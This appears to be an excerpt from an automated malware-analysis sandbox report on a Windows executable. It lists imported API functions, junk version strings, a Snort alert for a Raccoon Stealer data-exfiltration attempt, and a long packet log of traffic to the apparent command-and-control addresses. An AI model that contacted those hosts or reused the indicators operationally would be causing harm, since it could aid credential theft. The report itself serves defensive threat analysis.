                                                                                                  KERNEL32.dllHeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedIncrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, OpenSemaphoreA, GetSystemTimeAsFileTime, GetCommandLineA, WriteFileGather, CreateActCtxW, GetEnvironmentStrings, LeaveCriticalSection, GetFileAttributesA, ReadFile, GetDevicePowerState, GetProcAddress, FreeUserPhysicalPages, VerLanguageNameW, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, GlobalGetAtomNameW, WaitForMultipleObjects, EnumResourceTypesW, GetModuleFileNameA, GetModuleHandleA, EraseTape, GetStringTypeW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA
                                                                                                  USER32.dllGetCursorPos

                                                                                                  Exports

                                                                                                  NameOrdinalAddress
                                                                                                  @SetViceVariants@1210x401000

                                                                                                  Version Infos

                                                                                                  DescriptionData
                                                                                                  InternalNamesajbmiamezu.ise
                                                                                                  ProductVersion8.64.59.5
                                                                                                  CopyrightCopyrighz (C) 2021, fudkagat
                                                                                                  Translation0x0127 0x0081

                                                                                                  Possible Origin

                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  09/27/21-20:31:47.146649TCP2033974ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt4975580192.168.2.5194.180.174.100

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Sep 27, 2021 20:31:39.074569941 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.074611902 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.074709892 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.081022024 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.081054926 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.182138920 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.182287931 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.186701059 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.186727047 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.187242985 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.294323921 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.557163000 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.603141069 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.617072105 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.617091894 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.617110968 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.617172956 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.617188931 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.617233038 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.632837057 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.632875919 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.632910013 CEST49742443192.168.2.5149.154.167.99
                                                                                                  Sep 27, 2021 20:31:39.632921934 CEST44349742149.154.167.99192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.642687082 CEST4974580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:39.695291996 CEST8049745194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.695369005 CEST4974580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:39.696208000 CEST4974580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:39.696279049 CEST4974580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:39.748210907 CEST8049745194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.748224974 CEST8049745194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:40.108971119 CEST8049745194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:40.108994961 CEST8049745194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:40.109009027 CEST8049745194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:40.109021902 CEST8049745194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:40.109106064 CEST4974580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:40.109273911 CEST8049745194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:40.109555006 CEST8049745194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:40.109600067 CEST4974580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:40.119069099 CEST4974580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:40.171191931 CEST8049745194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:42.935735941 CEST4974580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:43.663855076 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:43.714797020 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.715023041 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:43.715740919 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:43.766666889 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.977533102 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.977555037 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.977579117 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.977602959 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.977626085 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.977648020 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.978944063 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:43.978977919 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:43.978985071 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.979017973 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.979048014 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.979080915 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:43.979286909 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.030337095 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030582905 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030620098 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030648947 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030674934 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030682087 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.030694962 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030714035 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030715942 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.030736923 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030752897 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.030764103 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030787945 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030788898 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.030808926 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030824900 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.030832052 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030854940 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030877113 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030883074 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.030915976 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.030960083 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.030992985 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.031023979 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.031040907 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.031081915 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.031141996 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.031182051 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.031208992 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.031263113 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.082365036 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082412958 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082437038 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082458019 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082474947 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082499027 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.082525015 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.082560062 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082598925 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082634926 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082652092 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082652092 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.082690001 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.082691908 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082747936 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082767963 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.082798958 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082823038 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082844019 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082844019 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.082894087 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.082945108 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.082967997 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083017111 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.083039045 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083070993 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083117962 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.083172083 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083317041 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083343983 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083373070 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.083389997 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083410978 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083467960 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.083564997 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083599091 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083632946 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.083641052 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083673954 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083690882 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.083713055 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083736897 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083758116 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.083761930 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083786964 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083817005 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.083842993 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083868027 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083890915 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083892107 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.083916903 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.083940029 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.083964109 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.084024906 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.084132910 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.084158897 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.084180117 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.084203005 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.084206104 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.084249020 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134123087 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134161949 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134185076 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134205103 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134229898 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134253979 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134275913 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134295940 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134311914 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134335041 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134335995 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134361982 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134383917 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134393930 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134428978 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134463072 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134489059 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134527922 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134547949 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134567976 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134573936 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134592056 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134613991 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134635925 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134637117 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134680986 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134807110 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134834051 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134855986 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134877920 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134877920 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134898901 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134917974 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134959936 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134984970 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135005951 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135071039 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135092974 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135114908 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135130882 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135175943 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135443926 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135613918 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135668993 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135684013 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135715961 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135741949 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135777950 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135782957 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135807037 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135826111 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135843992 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135883093 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135895014 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135924101 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135972023 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135978937 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136009932 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136034012 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136050940 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.136065006 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136087894 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136111021 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136126041 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.136166096 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136172056 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.136229992 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136364937 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.136552095 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136573076 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136626005 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185144901 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185200930 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185231924 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185250044 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185275078 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185288906 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185311079 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185333014 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185364962 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185365915 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185388088 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185404062 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185422897 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185445070 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185480118 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185547113 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185570955 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185595036 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185623884 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185647964 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185673952 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185687065 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185730934 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185750961 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185765982 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185775042 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185791969 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185800076 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185817957 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185841084 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185882092 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185956001 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185966969 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185981035 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186006069 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186034918 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.186084986 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186146975 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.186193943 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186917067 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186949015 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186974049 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187000036 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187001944 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187024117 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187031031 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187079906 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187082052 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187472105 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187536001 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187552929 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187581062 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187630892 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187768936 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187814951 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187871933 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187875986 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187916994 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187956095 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187961102 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187993050 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.188034058 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.188055992 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.188092947 CEST8049755194.180.174.100192.168.2.5
